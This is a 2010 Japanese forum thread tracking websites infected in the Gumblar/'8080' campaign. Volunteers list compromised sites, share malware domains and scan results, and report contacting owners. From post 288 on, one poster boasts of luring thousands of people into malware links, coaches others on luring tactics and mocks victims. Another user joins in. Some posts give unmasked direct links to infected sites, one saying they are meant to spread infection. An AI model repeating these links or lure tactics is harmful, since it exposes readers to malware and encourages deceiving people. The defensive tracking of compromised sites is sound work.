217 :名無しさん@お腹いっぱい。:2010/03/17(水) 21:36:14
ここで断言できる人はいないので作ってる人にきいてください

218 :名無しさん@お腹いっぱい。:2010/03/17(水) 23:18:14
>>216
Gumblar対策だけならReaderのままでもブラウザから自動起動されないようにすればいいだけだろ

219 :名無しさん@お腹いっぱい。:2010/03/18(木) 12:28:44
>>216
なる

>>217
断言ってお前馬鹿か?

220 :名無しさん@お腹いっぱい。:2010/03/18(木) 12:57:33
クチチ

221 :名無しさん@お腹いっぱい。:2010/03/18(木) 13:17:57
217じゃないが…
>>216に回答すりゃ、それは断言になるだろ
なに?よくわからないあいまいな答えが欲しかったの?


222 :名無しさん@お腹いっぱい。:2010/03/18(木) 15:00:52
だってそりゃお前、日本人だもの。
「どちらともいえない」が一番しっくりくるに決まってるべ。

223 :名無しさん@お腹いっぱい。:2010/03/18(木) 17:46:58
また変化する可能性もあるのに大丈夫とはいえないだろ

224 :名無しさん@お腹いっぱい。:2010/03/18(木) 18:11:35
Adobe Readerだって最新版使えばいいだけ
前のバージョンだってJavaScript無効にすればいいだけ
他社製にする必要もない

225 :名無しさん@お腹いっぱい。:2010/03/18(木) 18:28:17
既出のこれらのURLのスクリプトが変わったかもしれない
今まで検出していたavast!がスルーするようになった
VTの結果もほとんど: 3/42 (7.15%)

mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
www●avis●ne●jp/~muranaka/
www●hct●zaq●ne●jp/cpacs503/
www●i-paradise5●jp/~simple/otona/index●php
www●kadoma-c●com
www●kikuyakikai●com
www●sesica●co●jp

ttp://www.virustotal.com/jp/analisis/eaa158057d418417724f23fc8d9ee0b13550f5f52b409b3b373eb6ccdb4db791-1268903269
ttp://www.virustotal.com/jp/analisis/eab4a78a1dea07c29183259d476ff1646e04c0a9b3d9f50e13a30a9939431cf1-1268903344
ttp://www.virustotal.com/jp/analisis/5e3172387fe0932c3fcf9409f63c906e944283d2e7a453c8783ee4b13ef891e7-1268903385
ttp://www.virustotal.com/jp/analisis/6fc63e268e8bd0a9e2a385d3e7b833d1fa3640c6ca41bc758a7541dc7929d03c-1268901812
ttp://www.virustotal.com/jp/analisis/08b65c9a24c03b21cbf0ac849a3446511d4fab346526a98241077af45107e52f-1268903427
ttp://www.virustotal.com/jp/analisis/65eb3f33b66cfd3fc7745502c8c8275e632e66227db73126dbc624cc274f4c56-1268903475
ttp://www.virustotal.com/jp/analisis/3e77086644c08945bcd61ed7158702f6e31cf24e604bafd6d57d688176a781a5-1268903551
ttp://www.virustotal.com/jp/analisis/8f933e2e964ee8f32c5b30fff6f90dd00a890844f58195c6422de2a8c923c158-1268903603
ttp://www.virustotal.com/jp/analisis/02aa30e73bfa773f56eb0aedd94e7d0404f42a45c5ae6daf0d4e7211ac5a0b75-1268903654

226 :名無しさん@お腹いっぱい。:2010/03/18(木) 19:12:20
ただアドビ製品は今までMS以上の放置プレイで脆弱性修正を怠ってたから
最新版だろうがJavaScriptオフだろうがまだまだ山ほど脆弱性が残ってそうなのが怖いんだよな

227 :名無しさん@お腹いっぱい。:2010/03/18(木) 19:46:04
>>192
403になっとるな。本に紹介されたばっかりなのにね。
これ、お詫び無しパターンだぜ。

228 :名無しさん@お腹いっぱい。:2010/03/18(木) 20:05:11
>>225
s1●shard●jp/dreaming/
電凸完了

229 :名無しさん@お腹いっぱい。:2010/03/18(木) 20:25:41
>>225
www●avis●ne●jp/~muranaka/
電凸完了

230 :名無しさん@お腹いっぱい。:2010/03/18(木) 20:50:40
>>225
www●hct●zaq●ne●jp/cpacs503/
電凸完了

231 :名無しさん@お腹いっぱい。:2010/03/18(木) 20:53:27
あとは明日以降

232 :名無しさん@お腹いっぱい。:2010/03/18(木) 21:15:20
これらはたぶん再発
e-risingsun●net
faac3020●cpinet●jp/
www4●ocn●ne●jp/~ikl/member/index●htm
www●mfreep●com →スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった

VTの結果は 3〜4/42
ttp://www.virustotal.com/jp/analisis/1e78d4c8d6fca221474295925a83a578555088946bc69e6eb3d8cd604b50659b-1268913734
ttp://www.virustotal.com/jp/analisis/9df24eb6059480edf3b33e5483e58d3f85bcb1a10ff5a62a09b9626632edbef6-1268913822
ttp://www.virustotal.com/jp/analisis/672dae1c7819f7ffb97697bd689eadb41352c05a3d1fa90f19c0cedf0315a6ef-1268913915
ttp://www.virustotal.com/jp/analisis/b83677038bf352b34be91756d1ec4da1d555ce1b47b9b4842246969721bff227-1268913993

233 :名無しさん@お腹いっぱい。:2010/03/19(金) 00:02:01
>>225
挿入した不要な文字を函数で削除するタイプ
主要部はこれまでの応用だけど…

BuyTheBlenderma●ru:8080
404 Not Found
404 Not Found
YourSuperPool●ru:8080
SuperSuperMall●ru:8080
TheBlenderTutorial●ru:8080
TheBlenderTutorial●ru:8080
YourSuperPool●ru:8080
ExcellentBlender●ru:8080

どれもドメイン名に大文字が入ってるんだけど、
ひょっとして、これだけで検出できなくなるとか?

234 :名無しさん@お腹いっぱい。:2010/03/19(金) 00:15:49
>> 232
これも大文字入り

SuperSuperMall●ru
TheBlenderTv●ru
BuyTheBlender●ru
YourSuperPool●ru

> スクリプトはあるがaguseでは外部と接続するオブジェクトを検出しなかった
どれも、この5 IPのラウンドロピンですね
91●121●7●26
91●121●24●139
91●121●134●58
91●121●137●124
91●121●163●215


235 :名無しさん@お腹いっぱい。:2010/03/19(金) 08:53:54
電凸とか男前過ぎる。

236 :名無しさん@お腹いっぱい。 :2010/03/19(金) 10:12:22
route:          91.121.0.0/16
descr:          OVH ISP
descr:          Paris, France
origin:         AS16276
ここに電凸できれば、超男前だな


237 :名無しさん@お腹いっぱい。:2010/03/19(金) 10:14:01
www●kikuyakikai●com
感染している事を知っているにもかかわらず放置
電話しても担当者はいない、ここは会社ではなく個人の家
などと訳のわからない対応を行い、会社としての責任を果たしていない。


238 :名無しさん@お腹いっぱい。:2010/03/19(金) 10:17:57
googleから客来ないから潰れますよ、って言えばいい

239 :名無しさん@お腹いっぱい。:2010/03/19(金) 10:43:20
>>229
修復したけど感染告知無し。
こういう宿は泊まっても不快な思いをするだけだろうな。

240 :名無しさん@お腹いっぱい。:2010/03/19(金) 15:11:31
改竄されすぎw
//www●aquaview●jp/q_a/index●html


241 :名無しさん@お腹いっぱい。:2010/03/19(金) 16:25:11
//www●kanone●jp/

242 :名無しさん@お腹いっぱい。:2010/03/19(金) 16:30:22
俺がアクセスしたページに限って改竄されてて笑いました

243 :名無しさん@お腹いっぱい。:2010/03/19(金) 16:58:39
>>232とかのVTで検出成功してるアンチウイルスって何?
avast、AVG、カスペ、ノートン、G-DATA辺り?

244 :名無しさん@お腹いっぱい。:2010/03/19(金) 17:17:57
>>237
確認の為に電凸してみました。ワロタww

GMOインターネット株式会社に凸。。
んで、完了。

245 :名無しさん@お腹いっぱい。:2010/03/19(金) 18:06:58
>>206
亀レスで申し訳ない
それって、そもそもスルーされて監視が出来ないってことだよね?
例えば3つアンチウィルスを入れてたとしてそのうち一つでしか検出出来ないウィルスだとする
その唯一検出できる製品がスルーして、取りこぼすっていう可能性もある?
検出のされにくさとか関係ないんだよね?

246 :名無しさん@お腹いっぱい。:2010/03/19(金) 18:10:37
>>225
www●i-paradise5●jp/~simple/otona/index●php → 電話が繋がらないのでパス
www●kadoma-c●com → 上流に凸、既に別の有志より連絡が有ったとの事
www●kikuyakikai●com → >>244
www●sesica●co●jp → 上流に凸完了

247 :名無しさん@お腹いっぱい。:2010/03/19(金) 18:15:39
一休み

248 :名無しさん@お腹いっぱい。:2010/03/19(金) 18:42:47
>>245
AvastとMSEの組み合わせで起きるかは知らんが

昔流行ったセキュリティブログで紹介された
Avast(常駐ガードオフでシールドはオン)+AntiVirでダブルエンジン()というやつでは
検出できずにスルーしたという話があった気がする

249 :名無しさん@お腹いっぱい。:2010/03/20(土) 12:26:24
twentyfour-24●com

250 :名無しさん@お腹いっぱい。:2010/03/20(土) 12:36:22
www●jde-net●co●jp
ここも電話してもやる気のない対応
これが社長なんだから笑う

251 :名無しさん@お腹いっぱい。:2010/03/20(土) 12:40:36
おまいらこんなにどうやって見つけるの?

252 :名無しさん@お腹いっぱい。:2010/03/20(土) 12:47:20
www●jc-consulting●jp
www●e-kudamono●co●jp

253 :名無しさん@お腹いっぱい。:2010/03/20(土) 13:30:14
www●pflaster●jp/2009/12/

254 :名無しさん@お腹いっぱい。:2010/03/20(土) 14:10:19
>>250
味噌県の人間なんてそんなもんだ

255 :orz=3:2010/03/20(土) 14:25:00
we-rank●com/modules/bulletin1/rss●php
kallook●com
www●trajal●net/PR/index●html
--
www●bestofunder●com ←(笑)


256 :名無しさん@お腹いっぱい。:2010/03/20(土) 14:27:46
>>249
コレはレンタルサーバかな?
全滅してる。
http://www.google.com/search?num=50&hl=ja&q=twentyfour-24.com&btnG=%E6%A4%9C%E7%B4%A2&lr=lang_ja&aq=f&aqi=&aql=&oq=&gs_rfai=

257 :名無しさん@お腹いっぱい。:2010/03/20(土) 14:33:17
>>256
レン鯖じゃないよ。

誰かろりぽ通報頼んだ

258 :名無しさん@お腹いっぱい。:2010/03/20(土) 15:54:15
>>256
まじだwww
全部にこのサイトはコンピューターに(ry


259 :名無しさん@お腹いっぱい。:2010/03/20(土) 16:55:36
SEOばっかりだ

260 :名無しさん@お腹いっぱい。:2010/03/20(土) 16:56:18
umai●kitcut●org/omegatukau/
定番xrea

261 :名無しさん@お腹いっぱい。:2010/03/20(土) 18:49:26
全部感染してたらSEOも糞も無いという。
Google先生もいっそのこと検索結果から消してしまえばいいのに。

262 :名無しさん@お腹いっぱい。:2010/03/20(土) 21:24:50
>>256
ふつくしい…

263 :名無しさん@お腹いっぱい。:2010/03/20(土) 21:49:39
素人だからよくわからんが、オーキタ家具とかいう家具屋さんのHP見てたら、
ウイルスバスターさんから感染の警告きた・・・ もしかしてそのサイトウイルスばらまいてる?



264 :名無しさん@お腹いっぱい。:2010/03/20(土) 21:58:31
>>263

感染してますね

265 :名無しさん@お腹いっぱい。:2010/03/20(土) 22:05:56
やっぱり・・・

266 :名無しさん@お腹いっぱい。:2010/03/20(土) 23:24:15
オーキタ家具(絶賛放流中)
www●o-kitakagu●jp/

267 :名無しさん@お腹いっぱい。:2010/03/21(日) 02:24:01
>>266
Lynxで問い合わせフォームからつーほーした。
common/js/base.js も ぁぅぁぅぁー

268 :名無しさん@お腹いっぱい。:2010/03/21(日) 02:53:42
一向に下火にならんな
アホは、ウィルスサイトばらまいてるし
バカは、感染してると教えても再改ざんされるし
ここの人達の努力は、偉いよ

269 :名無しさん@お腹いっぱい。:2010/03/21(日) 03:23:48
自分のPCが感染してるかどうかを簡単に調べる方法ありますか?
スタートアップにsiszyd32.exeとTMD.tmpがいなくてregedit.exeが起動できれば
感染してないってことになりますか?

270 :名無しさん@お腹いっぱい。:2010/03/21(日) 04:11:56
スレの前の方に何か書いてあるぞ

271 :名無しさん@お腹いっぱい。:2010/03/21(日) 06:38:36
>>269
いいえ
ありません

272 :名無しさん@お腹いっぱい。:2010/03/21(日) 07:33:23
avastのブログに8080他の記事があった
http://blog.avast.com/2010/03/19/would-you-like-an-iframe-sir/
前菜が難読化Iframe、メインが8080本体でデザートが8080のスクリプト
「おいしい」メニューだって…

273 :名無しさん@お腹いっぱい。:2010/03/21(日) 10:00:40
nagoya●cool●ne●jp/yukaridazou

274 :コテハン:2010/03/21(日) 10:37:29
www●thaishin●co●jp/reform/index●html
www●knack●co●jp

ぁぅ・・・
http://www.google.co.jp/search?hl=ja&source=hp&q=%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+%22%3Bdocument.body.appendChild%28%22+-JAVA+-JAVAScript&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=


275 :コテハン:2010/03/21(日) 11:08:37
sandia●co●jp
www●hdta●jp
www●jc-consulting●jp/


閉鎖してもトロイの配布は止めないらしい・・・
www●daini-survey●com/
>誠に申し訳ありません。
>都合により、当ホームページを一時閉鎖させていただきます。
>これまで、当ホームページへアクセスいただき、有難うございました。
<<!-- \(^o^)/オワタ -->


276 :263:2010/03/21(日) 12:15:52
263の素人なんですが、どうやら踏んでしまったので対策について教えてほしいです。FTPパスワードの変更ってのは具体的に何をしたらいいですか?

とりあえず、踏んでしまったので、しばらくオフラインで使用して、その後リカバリーしようかなっと思ってます。
OSが入っていないドライブもフォーマットしないとだめなんですかね?

あと踏んだ時のPCの状態を書いておきます。

ウイルスバスターから警告くる→いつの間にかウイルスが隔離されてる(時間情報からオーキタ家具HPと判断)→総合検索(クッキーしかひっかからず)
→シマンテックさん・マカフィーさんの無料検索サービスでもひっかからず→とりあえずここに報告→現状

環境:Windows7 Ultimate (Updata最新版)
アドビリーダーUPDATAがあったが、言語サービスだったので、おそらく関係なし
FLASHPLAYER:最新版
IE8:初期設定のまま

普通に侵入されました(泣)


277 :名無しさん@お腹いっぱい。:2010/03/21(日) 12:26:25
釣り乙

278 :名無しさん@お腹いっぱい。:2010/03/21(日) 12:29:35
はいはいフォーマットフォーマット

279 :名無しさん@お腹いっぱい。:2010/03/21(日) 12:47:42
>>276
マジレスするとftpパスはウェブサイトをftpで管理してる人以外には関係ない

最低限システムドライブのフォーマットは必要だが
システム以外のドライブにウイルスのコピーが残ってないとは言えない
心配ならすべてのドライブをフォーマットするのが確実

280 :263:2010/03/21(日) 13:19:21
>>279
なるほど、そういうことなんですね・・・ありがとう。

281 :名無しさん@お腹いっぱい。:2010/03/21(日) 13:19:46
というかバスターが止めてくれたんなら問題ないでしょ

282 :名無しさん@お腹いっぱい。:2010/03/21(日) 13:44:27
改竄?
http://www●ibs-ishii-sports●co●jp/

全部消されてるのだが。

283 :名無しさん@お腹いっぱい。:2010/03/21(日) 13:54:39
でもウイルスバスター入れてたら感染しないよ?
なんといっても販売本数No1だからね

284 :名無しさん@お腹いっぱい。:2010/03/21(日) 13:57:23
>>276
ウイルスバスターが警告している時点で防いでるんじゃないか
脆弱性の対策もしているようだし感染はしていないだろ

285 :名無しさん@お腹いっぱい。:2010/03/21(日) 14:23:52
>>276
>FLASHPLAYER:最新版
バージョンはちゃんと書こうね。「10.0.45.2」とか。

286 :コテハン:2010/03/21(日) 14:50:49
ani-an●co●jp/
posh-e●com/index3●htm
minatomo●jp/
dxenglish●value-net●net
allgolf●web●fc2●com/a21 ←!
www●granship●com/index●html


287 :名無しさん@お腹いっぱい。:2010/03/21(日) 19:09:02
hamu22●hp●infoseek●co●jp
jumpfine●com/hiesyo1/
www●clca●or●jp/club/ ←再感染
www●slowstylegym●com

288 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 21:05:52
ちょっくら出張して
あらゆるスレで踏ませてきたぜb

(>w<)b俺GJ!


(VдV)ノシ AIONスレのみんなー♪みてるー♪

289 :あんちたった:2010/03/21(日) 21:24:50
↑これ犯罪じゃね?

290 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 21:41:16
>>289
(VДV)え!?






(VдV)お前犯罪者なの?これってお前のことだよな

291 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 21:42:42
まだまだ頑張るお
地雷マスターだおヽ(VдV)ノ今日だけで5000人以上に踏ませたお!

292 :名無しさん@お腹いっぱい。:2010/03/21(日) 21:49:57
>>291
素直に感動。

そこまで出来る勇気が欲しい。

ん?快楽殺人と同じような考え?
取り敢えず影ながら応援。

293 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 21:59:34
(VдV)なんか最近、本当に無知な奴が増えてきたよな
ウィルスURL踏ませるくらいじゃ罪には問われないんだぜ
それは俺がブログでも証明している
ttp://ruhuraro.blog57.fc2.com/blog-entry-161.html

まぁこの状況でURL踏むのは不安って奴は
「ウィルス 踏ませることは犯罪か?」で検索してみろ
http://search.yahoo.co.jp/search?fr=slv1-ff2tbtop&p=%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9%E3%80%80%E8%B8%8F%E3%81%BE%E3%81%9B%E3%82%8B%E3%81%93%E3%81%A8%E3%81%AF%E7%8A%AF%E7%BD%AA%E3%81%8B%EF%BC%9F&ei=UTF-8


294 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:01:11
うーん
しかし前にブログでまとめた内容だと我ながらわかり難い内容になってるな
(V`д´V)よし、こりゃ近々また更新すっか!


今度スティッカムとかでウィルス踏ませる実況配信とかしてみよかな



295 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:02:40
>>293
いや踏ませたぐらいで犯罪にならないのは知ってるがwww

ただそれをする行為は快楽殺人と同じなのでは・・・と思っただけ。
俺は踏ませようとするだけで無理。

ブログは拝見させて貰ってる。
何故か惹かれる。

296 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:07:03
殺人はおおげさだべ
まぁPC命な連中からしたら殺人的なのかもな
俺の影響でPC初期化しちまった奴に見つけ出して殺してやると言われたことも多々ある。

(VдV)俺様としてはただのゲーム感覚
踏ませる立場の心理は大体似たようなもんだろ
踏む奴は馬鹿、平和ボケ乙、ざまぁって感じだな

297 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:07:06
宣伝乙

298 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:11:28
何が俺様だよ。

299 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:12:05
<(V`д´V)>俺様えっへん!

300 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:13:24
>>296
それは「殺す」って言った方が悪い。それは殺人予告だな。

それに常時ソフト(常識)付けずに安易に踏む香具師が悪い。
このガンブラーのご時世でさwwwww

俺も踏ませようかな・・・
一応そういうの好きな方。

301 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:19:59
(VдV)ノ いいぞいいぞ!やっちゃえやっちゃえ!地雷デビューだー!
ちゃんと報告しろよ>w<踏ませるのもっと流行れ!




302 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:21:10
<(V`д´V)>そしてまたエッヘン!
  / \



303 :< ・、,,,;;,) ◆15oU7IjJp. :2010/03/21(日) 22:25:53
>>301
どこが狙い目?

304 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:33:01
狙い目とかねーよ
適当に行き当たりばったりで楽しめばいいさ
ただ過疎過ぎるとこだと言うまでもなく反応がなくて駄目

貼ってすぐに↑ウィルスだから踏むな!
って書かれた場合は次へ移行すればいい
自演で誘導するのもいいし。

そうだ最初はIDのないスレでやってみれば良い('д')

305 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:40:41
>>304
お手本見せてよ。よく分からない

306 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:49:31
>>304
言いだしっぺなのになw

307 :名無しさん@お腹いっぱい。:2010/03/21(日) 22:51:19
キモイのが粘着し始めたか
このスレももう終わりだな

308 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:54:10
頭悪いなぁ
そのくらいのことも自分で考えられないようじゃただの低脳だぜ

それに残念ながら
手本ならさっき踏ませてきたのがあるからな(VдV)┌
http://pc11.2ch.net/test/read.cgi/net/1269123304/108n-

309 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:57:06
>>307
うむ、お前も低脳だな
ウィルスURLが晒されてるスレをこの俺様こと、顔文字が見てるのは至極自然なことだお

( ´,дゝ`)少し考えればわかることでは〜?ボホホホホホwww

310 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 22:59:13
結局のとこ
俺様がゲーム感覚で行っていることも
常人にとってはとても難しいことだったりするわけか
てことはつまり・・・・










<(V`д´V)>またエッヘン!ってなるお!
  / \

311 :名無しさん@お腹いっぱい。:2010/03/21(日) 23:00:12
>>308
一つのスレだけじゃ分からないよ
もっと詳しく教えてよ

312 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:03:02
なにその低脳のワンパターンな発想
俺様に言われたことへ反論できず、仕方なくワンパターンな流れに逃げているのだな
ならこっちも目には目をワンパターンには・・・

<(V`д´V)>エッヘンパターンだお!!!!
 /  \


313 :名無しさん@お腹いっぱい。:2010/03/21(日) 23:07:03
>>311
お前煽り方が下手糞杉
この手のコテにそういう煽りは逆効果
余計調子に乗るだけ

314 :< ・、,,,;;,) ◆15oU7IjJp. :2010/03/21(日) 23:08:39
>>312
質問系でやった。

結構楽しいコレwwww

315 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:11:48
>>313

<(V`д´V)>な、なにーーーーー俺が調子に乗っているだとおおお?
  / \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@

316 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:13:23
>>314

<(´VдV`)>やってきたスレを貼らないとな?
  / \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@

317 :名無しさん@お腹いっぱい。:2010/03/21(日) 23:14:56
>>313
すまんかった。しかし春だからかな・・・・

318 :< ・、,,,;;,) ◆15oU7IjJp. :2010/03/21(日) 23:17:37
>>316
ttp://gimpo.2ch.net/test/read.cgi/body/1261380362/864

ttp://pc11.2ch.net/test/read.cgi/pcqa/1087711030/446

ttp://pc11.2ch.net/test/read.cgi/pcqa/1258223156/632


319 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:19:23
>>317

<(´VДV`)>ブワーッハッハッハッハ!!負け犬ザマァアア死ぬがよい!!!
  / \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@

320 :名無しさん@お腹いっぱい。:2010/03/21(日) 23:21:28
意味がわからない

321 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:25:41
>>318
(VдV)は?
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな

( ´,дゝ`)=3 お前もう不合格だお

322 :名無しさん@お腹いっぱい。:2010/03/21(日) 23:27:46
>>321
すまなかった・・・
そういう意味か・・・

分からなかった俺が悪いな。
一人でやるよ。

アドバイス有り難う。
ブログは読み続けるよ・・・

323 :(VдV) ◆yUyb3Tqn92 :2010/03/21(日) 23:42:50
(VДV)おうよ!!!!
(VдV)
VдV)
дV)
'д')
д')
')
)


三VдV)ノシ

324 :(VдV) ◆yUyb3Tqn92 :2010/03/22(月) 00:07:10
Дブワハハハハハ!!
ガンブラー最高だわ!

今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ
いつもならウィルスでしたー>w<駆除ガンバ!
って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが

ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお>w<どうなることやらw

325 :名無しさん@お腹いっぱい。:2010/03/22(月) 00:16:13
genoの違約金っていくら払うの?商品を返品したいんだけど

326 :名無しさん@お腹いっぱい。:2010/03/22(月) 00:19:44
>>325
板違い

327 :名無しさん@お腹いっぱい。:2010/03/22(月) 03:25:21
8080系のオペラで踏んじゃったけどJRE入れて無かったら感染しない?

328 :名無しさん@お腹いっぱい。:2010/03/22(月) 04:52:06
VB2010が何も反応しなかったけど、そういうウィルスなの?

329 :名無しさん@お腹いっぱい。:2010/03/22(月) 04:53:56
url貼ってみ

330 :名無しさん@お腹いっぱい。:2010/03/22(月) 04:56:46
↑のゴミコテが貼ったと思われるサイトです。

http://www.i-paradise5.jp/~simple/otona/index.php

331 :名無しさん@お腹いっぱい。:2010/03/22(月) 05:54:50
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

332 :名無しさん@お腹いっぱい。:2010/03/22(月) 05:59:50
>>330
8080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど

333 :名無しさん@お腹いっぱい。:2010/03/22(月) 06:05:28
>>331
申し訳ない

>>332
特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね?

334 :名無しさん@お腹いっぱい。:2010/03/22(月) 06:07:07
>>330
ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270
ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270

335 :名無しさん@お腹いっぱい。:2010/03/22(月) 06:16:52
>>333
>>2-4の2を適用していれば無問題

336 :名無しさん@お腹いっぱい。:2010/03/22(月) 06:25:41
>>335
わざわざすいません。
早速実施します。

337 :名無しさん@お腹いっぱい。:2010/03/22(月) 06:48:16
>>336
いまからじゃ無駄
OS、ドライブフォーマットせい

338 :(VдV) ◆yUyb3Tqn92 :2010/03/22(月) 12:43:59
>>330>>336
(VДV)ブウァハハッハハハッハハハハッハッハ!!!!!ザッマァアアア!!!!ヒャーッハー!
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな>w<

そういう悔しそうな書き込みを見てしまうとますます俺様がヽ(VДV)ノ 喜んでしまうではないか!!!!
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑

(VДV)ザッマァッァアァァアアみろ!死ねっ!!!お前のようなゴミはPCと一緒に焼却されてこいお(>w<)

おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ?(>w<)そのくらい頭に血が上っているのでは〜?W


339 :(VдV) ◆yUyb3Tqn92 :2010/03/22(月) 12:47:20
(*VдV*)あーウケタw
(*VдV*)まさか俺様にPC壊された低脳が来るとは・・・

・・・思ってたよ!!!!!(>w<)!!!!!

(VдV)今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな

340 :(VдV) ◆yUyb3Tqn92 :2010/03/22(月) 12:49:57
(VдV)そしてその間、俺様はというと
買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW


(V`д´V)な、わかったろ
正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。

341 :(VдV) ◆yUyb3Tqn92 :2010/03/22(月) 12:53:04
(VдV)ここでURL鑑定したり
URLまとめてる連中も同罪だな。
むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。

なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(>w<)

(VдV)え?どこって?さぁ〜(笑)

そうだ、これ勇気スレにもマルチしとこっと

342 :名無しさん@お腹いっぱい。:2010/03/22(月) 13:48:12
>>341
楽しいか?
よかったなカス


343 :名無しさん@お腹いっぱい。:2010/03/22(月) 14:14:42
>341
pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp

344 :名無しさん@お腹いっぱい。:2010/03/22(月) 14:17:18
>>343
341のIP?OCNだと困るな・・・

345 :名無しさん@お腹いっぱい。:2010/03/22(月) 14:48:15
>>343
串だろそれ。

串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね?

346 :343:2010/03/22(月) 15:13:14
>>344-345
■network/ISP/OCN逆引きホスト地域割当表
ttp://wiki.tomocha.net/network_ISP_OCN.html
>ipbf Bフレッツ
>神奈川県 hodogaya.kanagawa.ocn.ne.jp

pXXXX-ipbfXXXXhodogaya.kanagawa.ocn.ne.jp


<!-- ここにアフィ --!> とか・・・ワロタwww

347 :名無しさん@お腹いっぱい。:2010/03/22(月) 17:41:59
なんかすげーのが沸いてる

348 :名無しさん@お腹いっぱい。:2010/03/22(月) 17:56:48
ローカルあぼ〜んも出来ないのかね、お前等

349 :名無しさん@お腹いっぱい。:2010/03/22(月) 20:18:04
串サイトも危ないのかなあ

350 :名無しさん@お腹いっぱい。:2010/03/22(月) 20:22:17
一般サイトも危ないのに串サイトなんて・・・

351 :名無しさん@お腹いっぱい。:2010/03/22(月) 21:39:43
>>349
串使う事自体が頭おかしい

352 :名無しさん@お腹いっぱい。:2010/03/22(月) 21:59:02
>>351
規制に巻き込まれた時にちょっと使うだけ・・・

353 :名無しさん@お腹いっぱい。:2010/03/22(月) 22:26:30
>>352
代行レススレでいいじゃない
もしくは漫喫

354 :名無しさん@お腹いっぱい。:2010/03/22(月) 23:19:12
●買えばいいよ

355 :名無しさん@お腹いっぱい。:2010/03/22(月) 23:21:18
メモ用
http://www.jde-net.co.jp/engineering/index.php
http://www.kikuyakikai.com/

356 :名無しさん@お腹いっぱい。:2010/03/22(月) 23:33:19
ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

357 :名無しさん@お腹いっぱい。:2010/03/22(月) 23:43:16
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! わしのAAを壊しおって!
    |    _||||||||| |
     \ / \_/ /
       \____/


358 :名無しさん@お腹いっぱい。:2010/03/22(月) 23:49:07
直リンしたのはあちこちでウィルス踏ませてる顔文字さんのためでもあるのです
誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね
じゃんじゃん感染してけばいいとおもうにだ

359 :名無しさん@お腹いっぱい。:2010/03/23(火) 03:56:30
>>341,358
ttp://ja.wikipedia.org/wiki/%E5%B9%87%E5%8A%A9%E7%8A%AF

マルウェアの作者と手を組んでやってるんじゃなくて
おまいらが陥落サイトのURLを貼って「勝手に手助け」してるだけだから

>共犯独立性説に立った場合には、実行従属性は不要となり、
>幇助行為が行われた時点で犯罪は完成する。

釣ったやつが感染して、情報流出等の被害が出た場合・・・
訴えられたら逮捕されるだろうねぇ。


